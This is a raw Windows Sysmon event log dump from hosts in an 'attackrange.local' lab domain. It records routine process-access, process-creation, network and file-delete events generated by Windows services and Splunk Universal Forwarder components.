07:56:26.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808319Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:26.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808318Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808317Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:26.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808316Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808315Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:26.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808314Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.237{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F5AA-60EB-9279-00000000D001}2052C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808313Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.237{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F5AA-60EB-9279-00000000D001}2052C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808312Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.222{0C1E0330-F5AA-60EB-9279-00000000D001}2052C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000808311Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.260{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57319-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808355Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:27.924{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CCE4D80A0D80E00653F779258ECB41E0,SHA256=8A06136C69CD235460E9C51AFE3E0EF31089FDF95CA7ABD96F138754F42EF304,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808354Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:27.924{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D0FF3C430BF44E4FDB5814BCB9E43A8,SHA256=F755F13C692C53B8025CD00A634C3D9FF981C0F62096557663A04DB0756DC81D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050409Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:27.672{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9FE15A38462A0E9EC672F3E9E7EB99C,SHA256=DCF8FC77136666A064C23CDF8051B6799EEF7306E94397A81AB1CA01AB2B5F07,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808353Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:27.487{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F5AB-60EB-9479-00000000D001}1892C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000808352Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:27.487{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808351Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:27.487{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000808350Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:27.471{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808349Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:27.471{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808348Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:27.471{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808347Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:27.471{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808346Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:27.471{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808345Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:27.471{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808344Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:56:27.471{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808343Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:27.471{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F5AB-60EB-9479-00000000D001}1892C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808342Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:27.471{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F5AB-60EB-9479-00000000D001}1892C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808341Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:27.472{0C1E0330-F5AB-60EB-9479-00000000D001}1892C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808370Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:28.940{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FC62899380E2703F66BD2F00EB2AD35,SHA256=BF5086BD0307C7109271B11BB0AECE36AEC3ABDD5440E660850CB0874E23076D,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001050411Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:28.690{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D67F752B94210F80E6B339745C5F88A9,SHA256=D86127C7E9B97914D3FBD1872367D1A13C4611BD592E3D53588B4A52798C53A0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808369Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:28.331{0C1E0330-F5AC-60EB-9579-00000000D001}2448928C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808368Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:28.159{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F5AC-60EB-9579-00000000D001}2448C:\Program 